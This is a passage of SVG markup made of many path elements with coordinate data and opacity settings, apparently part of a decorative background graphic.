25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path 